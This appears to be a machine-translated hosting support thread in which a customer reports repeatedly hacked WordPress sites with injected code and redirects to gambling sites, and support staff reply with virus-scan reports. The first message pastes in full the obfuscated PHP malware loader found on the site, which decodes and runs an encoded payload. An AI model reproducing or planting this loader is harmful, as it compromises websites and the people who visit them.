| Question: |
Traces of hacking. The password changed. In the beginning was the injection of code: $osemosuf=\"create_\";global $egugob; $egugob=array(`$egugob[0]=array_pop($egugob);$felemod=felemod(4);$egugob[0]=$felemod($egugob[2]);`,`$egugob[2]=gzuncompress(felemod(361^937,3966^1612));`,`TUd6YnR2d39Ja29oZXZsfH1mbG4xa25obud+c21oKmZqaHd6SWx4dFVid2V2b0d6aENPv1lbwlzdr0xnvfbmrexounvvrk9suehexk1xdxl4agbirlvuq1zosergwldyugjuawnwfxu5btshpd1ewnh4auizkdc2nsfadnrqmg5ae3brc09lavisx2v/ZXJWdjpYbWRcOUVZTEJGSUhFb3JwaCp1bxdgawt/YXMyaHljYG0+amBmY2N8M3R3cWV3IWlre3FufCxkbXZqdhz+JnN0Z3F5PSkrTF90Jk9SUEhSXlZZTDBdknjlz3d9oyjgbn1pa3xwohrmbmlqm35zdw97flh9let5avvdvu1iru1vtvhnzslurvzrxujgrflhqussduhwu0fkvelkxkpdsl9hs191ogu/T1JQSFJDSk9KVUVfUF1VKGJhbiJlcWd9e25mkhrxdijlcwdlu0codhf2inp2axnkrev4tihxddvuexd+fWRwN3ZyYmBiKWZ5WWZydmh3bHJGfnV6w3x8yvbewizts1qocw1tq0liuvzts1rcreq/cTJvKHJpaCI4f2V2filte3p5UEN8KHJpaci4ueldj3f2fgspyy0ocmlovuwocxq1bnl3fn1kcddgy21nzmj3kmfpdntockzucxgpeghgiyhweeapamt/Zl9yWHxyNyp5Y3d1c2xjZ3k7fHNvWkNkehn/KnBkeHx+YiRqfWF4VjFpZTIqfmJ5e2tqJGp9YSY2khf0nw55d2xxbspofwm+fTpJbCFtOU0rIXI5aGVmP3olWjtdNXVtixa5fenkc3z0ul1zstzvcnbonzk2vfzjoxghctl+anVfI1duaG1sc3RjcHd9Yls/RnMhcTl7eDNifmF7UEpqPTBiIXE5a2Y2uv5mwispoynvwu9pd2w3nmq3qsgxkfjnfvf/moEAZEH7wu7x/w2E0HmalDIjTdTeceyZgl87PViq5R8IRpi5hnkiktfx52h9lfffvopgzebu3mxd9t+XazH6wXjklcnUov3E/Ydg9B6WaVOWoAePGen7MhIq5SX7emM4Wml61y1g+WgurqqzM0Iqb8O/7j6oJhkEy4+6JflG1iWKkmY9B7yphSkR1mvtl7ruJFepjfotfed33eozi8znysrswzkaijedacalzyqag/1Euy5j24YlQm0XqW3mXc26rCYMUhVMgSxdbonsahlwvhm6us638vpow+2fttFmeGrm4i9qBlyJF6hNaS24ml9oiDthwdsilwooxjgzf7dq1rjsnx4rauyjjne60u/1gCQ59usqkWYaogfQTbiA5czmNBRpFfcsnqfnqortcsy0j1cfnvoqeikzvhx19zevkc85agfwmlgc2mkqyfqdhdcdkmslkycglk0s8g6mx3mxwrhaoqp1s6e/+/9zt2FrCmV4AiJDov/0Ipg2n7Dp/pkOs6f9gyLinpja+Xcg4UmhJd0jHITHVQm+7nT5CqpPuvsivNp9DDwr7CJq64ek6O6jeka5em/SXwwuOLBQwHmnWAi6Z/75+gGp8uH1+/DysSUaEqVD7XKlXQmaZZe7Snfpl9T+ydBHMlakTIMxBLbfKLO31vdXNTwCF+f2D+/BZ1LGQdN9AKdxiVIt7i7m9599/ZW7MHvI42VkmoSKXO4fJXcgS18NRPL3Kkmwxekkzfbvpnkpnjmnxna15axgvi3m9nsl25f6ahedp/Q3xlM8j9h75hwkGBkguFnLQwOTyHCIpPpxsnmxmlsflg9gsw2p6etbgn6kok2kyksfqjmgeci+AUU/FQA8q7vHuTRyw1b5hgwrgzfLv2gJfqRUvvgecwn54tpz5gb7t6zn4u9ub3rwzpxegau+mR6w+XlVchX9q1nVL1BLEKO2EdMQyePuy0nvP5nbnlsderugq/Kxsm6xS52300KtH5mYs57aPpmjJFWeh78hiqpk3zusn5avbyn8ser78p63kd05wtjjm98ycydimooehkiiwdnsgqgqjghunftydcuxpy4yhmtwxrnr6ty/odDUZCAAi2H1EOknDobr6nBPGAKphYfRfw6y7lwuceatyw/ZGgQGz4/afY/N19OdThir8dD8L5DaS1zYdD0SZjg8L7Wjp5pk+4YyROnNmVBhwwNMxUdOjT0dlBbV2p1g3lt9ynb5ezejrmoxvg9v6b0mm4vece+G+CHDVsZ1BjUaUJhUwoYwm6G+UJ3GavRiGtyTZCPtS8euwcOGgLD+412PXbCyqsUba9Pem/RVPdKcVq2OhBKkXIsXgoxWz1FQSIwz434vpwkxicvsqih6gru0spqk9rmlmmofwdbfx37q7ji8xqwaj8tfvrawcllbdyzhajvcmceohwqugueb77/FoD1RdWASGYHTf6dw4Phe/iknOUupuLDusT49k6w8lLAuuEcZr/ly4or4MBVWiOTvxSoD4G2eiOmFcrv8C3vsvvot4suhxqs+BeeXnfO1A2tQ+hz8qY1dFJRMUZWCS2awj2HojhYxMn1Ldrua/3NvEAtZOtXOCck3nCUbH+FwFQBTnrM0F3SNhu3JN9RDWtw4/rAlNU+HnMGwZva2QJ9j12wQKxB3zD7vhpyGlJBysl0jxw8a1tchmkc2f2vmwqemvhesgqa6jkrxl6ka0x1wlq1rrmoiwuzct+TtIg+wubpsvAJDM41A47eWrAf0sDWebmHGQZdgempnryiwy6gno6nitsqv8/SnocvZ/LGO52Kn33Iqk5xnresuZOskPwMImBCzvolfy/SiTGIqKb2XlHSWVhOEZlwKeFL64cRgd/O8NBBTAyR5+Dv2j47xgL1Z/enu63cxKtTWIq0hwLl8OVmBLDvizWix3adqxuatxiutwutlnch/RyiL5cCdrSv9sHwevL+DkRi6oF9KqXzI5oBT/zLG+MROpGFDIAvCpJU9sOJA8uGsD92rz8bA4hra2n7yo+FZQk18qc33akB1/KJLXGt8OQWCxNvJ0lf4gudy9zoHh34e1zrw4anjdwky5cfspjio7ykm9xk6yfnhmatje87fnvyzd21aortxpqsowntu6jyd7qym147okv/mwh/KgJpg2vl76kV35ZjJtVoujIPgBPgt2Kp35qowmvrccdveupo6x4oooek8ehgyspnfr5fd+fhHQRlZ8IWEqjOP+YUAPhDJUEAES4oFL7mamlhBvvxtaVvhFe45ywgsxamceku4czdtlvkeq0fpqwtnc7uatfdqn+DdqGPCShNIZV3PHjIHaBA93RU1nEXy6pu9/dW7EPjHDNmCtondjldIvdohgk8abpXXhyipgfv+x3j99s97KihrELuExV9HjKtxVllS1ME0jpubpzdtpashvha2w8pjtolexqtqeyjql03hrflozueailst7bdz1iwqrreaow5iizabm7fk2jsekawiejxhwidoddpgnmqgtd1d2nfk71rocyynhpkucudenijg+8J0/ClEMUIRYhM0vxYq8sBRhVG5TsT4TdBnK66yttvai7a3mabfvdrsgaep8u1mughphixinvv6rd723xlay6rxxjtkpszlpysw+QBGrzNX2bqi27jeVa7Zf744xbE9W4rP0ykze59eh0mshrxwce+hp682P2Kchv8fijxnEUul0Giwdrdr4Z2ej10ewsq7spuesetrjvuqw9w1eg7xlofz0q+/+KC79BatWffjycxmvNzohAw44xd2p9F0V+jsVlnRX6WjdMh3MMorxzMoS8sdZ8aySMgwgbtbec3urq0/Jk08FSy64jZp2Vf+CSGsfziZemMoFUaTlNpoJ7KmJgaAKajmpruwazz2olva6ajg0zbxrylwuxukyk8o6z6wiggp1tjydago1kvafr+juAA4vtFnG6RtKr0GglANuXmbzzKCBcA+Qur+WOUfAvgmTaaN7G/292QP5PLkg+/JcyWUsEkajd+oecFg6omyBHrZoOwAOvJZiYFJqdALG/xSWuMI8iWMsjYqn42G0P/6puzrHpdhbRqAn/uMdIGvMqyhvpGVh+QMPfZiP0Tn7MWYc0KraKeZ5H5f3uTsZ+oREk9tk2IpZWd3fTsiRm59aWt8cA==`,\"r&cNegw};\\x22Fn}ik|p\");if(function_exists($osemosuf.=`function`)&&!function_exists(`felemod`)){ function felemod($k,$b=13){global $egugob;$z=str_pad($G=\"gFD8m69J8JdXu3ah\",$b,$G);$T=str_repeat(\"\\xe0\",$b);$B=str_repeat(\"\\x1f\",$b);$j=substr($egugob[0],$k,$b);return(($j^$z)&$B)|($j&$T);};for($Ip=-1;++$Ip<3;$osemosuf(\",`}`.$egugob[$Ip].`{`));};unset($egugob); |
| Answer: |
Hello. please Wait, we will check your site for viruses. |
| Answer: |
the result of the check in a folder domains in the file: /www/AI-BOLIT-REPORT-__-527501-14-07-2016_21-36.html` |
| Question: |
Yesterday completely killed the www folder and upload a clean backup sites. The password changed. Now again began to appear superfluous files and all WordPress sites have become inaccessible. What a joke? |
| Answer: |
the Question referred to the administrator, odite amps. |
| Answer: |
are you sure the backup was clean? |
| Question: |
Don`t know when deep scanning detecting single file for 24кб with tronika. I will cover the hole and try to fill again. |
| Answer: |
proveriat on your computer this https://revisium.com/kb/scan_site_windows.html |
| Question: |
Again, the hacking, adding the code in .js files. Well it is.. |
| Answer: |
Hello. what kind of website is it? what site have you been hacked? |
| Question: |
On ALL of my sites appeared or extraneous files or pieces of code in files. Because of this, when entering the sites there is a redirect on the playing resources. |
| Answer: |
Specify the site address. |
| Question: |
For example http://zoohybrid.ru/ |
| Answer: |
we checked this website for viruses, it is not infected. zoohybrid.ru/AI-BOLIT-REPORT-__-505835-16-08-2016_10-17.html |
| Answer: |
what plugins you ostavlyali? what this essentially setlinks_a6ed8 ? |
| Question: |
Not infected because I cleaned. Can look in the backup. With setlinks_a6ed8 all right, this is the code of the exchange http://www.setlinks.ru/ |
| Question: |
Plugins new a long time ago was not set. I certainly don`t know the exact reasons, but it`s still suspicious that for all the previous years I did not know sorrow, and your hosting already the second time for 2.5 months. |
| Answer: |
which site is infected now? |
